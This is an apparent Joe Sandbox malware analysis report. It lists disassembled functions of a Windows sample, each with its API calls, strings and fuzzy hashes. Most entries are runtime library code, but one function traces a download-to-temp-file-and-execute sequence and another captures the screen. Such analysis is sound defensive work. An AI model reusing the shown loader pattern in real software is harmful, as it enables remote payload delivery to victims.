Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 58b9be14918f1d440f00fc37e96827639e54099312ecb86735a08bdafa71ead0
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 1311E77720004247DE58CB3ED8B46BBEF95EBC7268B2D56BBD0414B758D322E145D620

Function 009E9D6B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130543835.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009E9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e9000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 120edc16b2efa0d9de7d14905269c7dbfbc7651aea4de2bdc14f84ef91237743
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 4A118E72340110AFDB55DF5ADC81FA673EAEB88320B298165FD08CB356E679EC41C760

Function 02470D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 8d0a441c2d4b0705bf0afeee984720ee9befd2432816eb00777e17293a30e26e
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 14012672A126008FDF21CF60C904BEB33F5FB86206F1554B6D92AD7381E370A841CB80

Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
GetClientRect.USER32(?,?), ref: 0040214A
GetDC.USER32(?), ref: 00402151
CreateSolidBrush.GDI32(00646464), ref: 00402164
SelectObject.GDI32(00000000,00000000), ref: 00402178
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
SelectObject.GDI32(00000000,00000000), ref: 00402191
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
SelectObject.GDI32(00000000,00000000), ref: 004021EA
SetBkMode.GDI32(?,00000001), ref: 00402267
SetTextColor.GDI32(?,00000000), ref: 00402276
_wcslen.LIBCMT ref: 0040227F

Strings

Tahoma, xrefs: 004021BE

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14

Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025CD
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
ReleaseCapture.USER32 ref: 004025F2
GetDC.USER32(00000000), ref: 00402619
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
CreateCompatibleDC.GDI32(?), ref: 004026A9
SelectObject.GDI32(00000000,00000000), ref: 004026B3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
ShowWindow.USER32(?,00000000), ref: 004026EA
GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
DeleteFileW.KERNEL32(?), ref: 00402731
DeleteDC.GDI32(00000000), ref: 00402738
DeleteObject.GDI32(00000000), ref: 0040273F
ReleaseDC.USER32(00000000,?), ref: 0040274D
DestroyWindow.USER32(?), ref: 00402754
SetCapture.USER32(?), ref: 004027A1
GetDC.USER32(00000000), ref: 004027D5
ReleaseDC.USER32(00000000,00000000), ref: 004027EB
GetKeyState.USER32(0000001B), ref: 004027F8
DestroyWindow.USER32(?), ref: 0040280D

Strings

gya, xrefs: 0040270B

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: gya
API String ID: 2545303185-1989253062
Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C

Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E722
_free.LIBCMT ref: 0042E738
_free.LIBCMT ref: 0042E749
_free.LIBCMT ref: 0042E75A
_free.LIBCMT ref: 0042E771
GetCPInfo.KERNEL32(?,?), ref: 0042E7B9

Part of subcall function 004366EB: _free.LIBCMT ref: 00436756

_free.LIBCMT ref: 0042E965
_free.LIBCMT ref: 0042E978
_free.LIBCMT ref: 0042E986
_free.LIBCMT ref: 0042E991
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E3
_free.LIBCMT ref: 0042E9EB
_free.LIBCMT ref: 0042E9F9

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24

Function 0249E919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0249E989
_free.LIBCMT ref: 0249E99F
_free.LIBCMT ref: 0249E9B0
_free.LIBCMT ref: 0249E9C1
_free.LIBCMT ref: 0249E9D8
GetCPInfo.KERNEL32(?,?), ref: 0249EA20

Part of subcall function 024A6952: _free.LIBCMT ref: 024A69BD

_free.LIBCMT ref: 0249EBCC
_free.LIBCMT ref: 0249EBDF
_free.LIBCMT ref: 0249EBED
_free.LIBCMT ref: 0249EBF8
_free.LIBCMT ref: 0249EC3A
_free.LIBCMT ref: 0249EC42
_free.LIBCMT ref: 0249EC4A
_free.LIBCMT ref: 0249EC52
_free.LIBCMT ref: 0249EC60

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: ea4dd1e2edb3804b974ab9388d5c5612ae3dc984f0881e9333345666a15f48f5
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: 7DB18C71A002099FDF21DF69C890BAEBBF5BF08304F14456FE495A7351EB75A841CB20

Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A63C

Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80

_free.LIBCMT ref: 0043A631

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A653
_free.LIBCMT ref: 0043A668
_free.LIBCMT ref: 0043A673
_free.LIBCMT ref: 0043A695
_free.LIBCMT ref: 0043A6A8
_free.LIBCMT ref: 0043A6B6
_free.LIBCMT ref: 0043A6C1
_free.LIBCMT ref: 0043A6F9
_free.LIBCMT ref: 0043A700
_free.LIBCMT ref: 0043A71D
_free.LIBCMT ref: 0043A735

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

Function 024AA85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 024AA8A3

Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C0F
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C21
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C33
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C45
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C57
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C69
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C7B
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C8D
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C9F
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CB1
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CC3
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CD5
Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CE7

_free.LIBCMT ref: 024AA898

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024AA8BA
_free.LIBCMT ref: 024AA8CF
_free.LIBCMT ref: 024AA8DA
_free.LIBCMT ref: 024AA8FC
_free.LIBCMT ref: 024AA90F
_free.LIBCMT ref: 024AA91D
_free.LIBCMT ref: 024AA928
_free.LIBCMT ref: 024AA960
_free.LIBCMT ref: 024AA967
_free.LIBCMT ref: 024AA984
_free.LIBCMT ref: 024AA99C

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 61d5de76b14839442d11903472a2cdec6576f1d17c1d549a5c928842c304e09d
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: 963169316006109FEB30AF3AD864B5BB7FABF20790F15486FE449D7650EB75E890CA64

Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AD1
_free.LIBCMT ref: 00439AF5
_free.LIBCMT ref: 00439B02
_free.LIBCMT ref: 00439B27
_free.LIBCMT ref: 00439B34
_free.LIBCMT ref: 00439B3D
_free.LIBCMT ref: 00439E1B
_free.LIBCMT ref: 00439E23

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

Function 02472C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02472C7E
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02472C94
GetTempPathW.KERNEL32(00000105,?), ref: 02472CB0
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02472CC6
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02472CFF
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02472D3B
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02472D58
ShellExecuteExW.SHELL32(?), ref: 02472DCF
WaitForSingleObject.KERNEL32(?,00008000), ref: 02472DE4

Strings

<, xrefs: 02472DAC

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: <
API String ID: 838076374-4251816714
Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction ID: 22b57108b106403687976060af338e9340447ede32335b889625f8e81898c464
Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction Fuzzy Hash: 15414F7190021DAFEB20DF659C85FEAB7BCFF05745F0080EAA559A2150DFB09E858FA4

Function 0248EEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0248F228,00000004,02487D87,00000004,02488069), ref: 0248EEF9
GetLastError.KERNEL32(?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000,?), ref: 0248EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000), ref: 0248EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0248EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF9D

Strings

advapi32.dll, xrefs: 0248EEF3, 0248EEF8, 0248EF14

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction ID: be539c59c0a4feddeb50347d1f5abeb56d576b029bf47a9ed791a1a492c616bd
Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction Fuzzy Hash: A1217CB1914651BFE7107FB4DC08A5EBBA8EF05B16F004A2AF555E3640CBBC94418FA8

Function 0248EEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0248F228,00000004,02487D87,00000004,02488069), ref: 0248EEF9
GetLastError.KERNEL32(?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000,?), ref: 0248EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000), ref: 0248EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0248EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF9D

Strings

advapi32.dll, xrefs: 0248EEF3, 0248EEF8, 0248EF14

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction ID: 38840c7213b1f9bc860e98fb0ddd366cafa539f947be498571399ad82e86b70b
Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction Fuzzy Hash: 2E218EB1914751BFE7107FA4DC08A5ABBECEF05B16F004A2BF555E3640CBBC94418BA8

Function 024824A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0248670B), ref: 024824B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024824C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024824D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0248670B), ref: 02482500
GetProcAddress.KERNEL32(00000000), ref: 02482507
GetLastError.KERNEL32(?,?,?,0248670B), ref: 02482522
GetLastError.KERNEL32(?,?,?,0248670B), ref: 0248252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482544
__CxxThrowException@8.LIBVCRUNTIME ref: 02482552

Strings

kernel32.dll, xrefs: 024824B0, 024824B5, 024824FA

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction ID: 64c3c52ceab967ea1986fba65a5ecdcf1e2e5302cd2743fb97272074f9df90ec
Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction Fuzzy Hash: E711C2759103517FE710BBB5AC59A6F3BECDE06B12720052BB801E2291EBB8D5008A6C

Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866

Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424898
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042495C

Strings

switchState, xrefs: 00424882
pContext, xrefs: 00424946

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798

Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
DuplicateHandle.KERNEL32(00000000), ref: 00419779
SafeRWList.LIBCONCRT ref: 00419798

Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
Part of subcall function 00417767: List.LIBCMT ref: 00417782

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
GetLastError.KERNEL32 ref: 004197B9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197DD

Strings

eventObject, xrefs: 004197A2

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D

Function 0041513E Relevance: 15.2, APIs: 10, Instructions: 175COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415249

Part of subcall function 00414C5A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C6E

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415272

Part of subcall function 004130D4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004130F0

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415299
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415153

Part of subcall function 00413138: __EH_prolog3_GS.LIBCMT ref: 0041313F
Part of subcall function 00413138: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041314E
Part of subcall function 00413138: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413155
Part of subcall function 00413138: GetCurrentThread.KERNEL32 ref: 0041317D
Part of subcall function 00413138: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00413187

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415174
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151AB
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151EE
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004152E1
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415305
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415312

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
String ID:
API String ID: 64082781-0
Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction ID: 68d129af9073e170e0bd2ed5c1ca810268e1faaa5ea0560f3945f8c62b51e45f
Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction Fuzzy Hash: 8B619B72A00715DFDB18CFA5E8D26EEB7B1FB84316F24806ED45697242D738A981CF48

Function 024853A5 Relevance: 15.2, APIs: 10, Instructions: 175COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 024854B0

Part of subcall function 02484EC1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 02484ED5

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 024854D9

Part of subcall function 0248333B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02483357

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02485500
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 024853BA

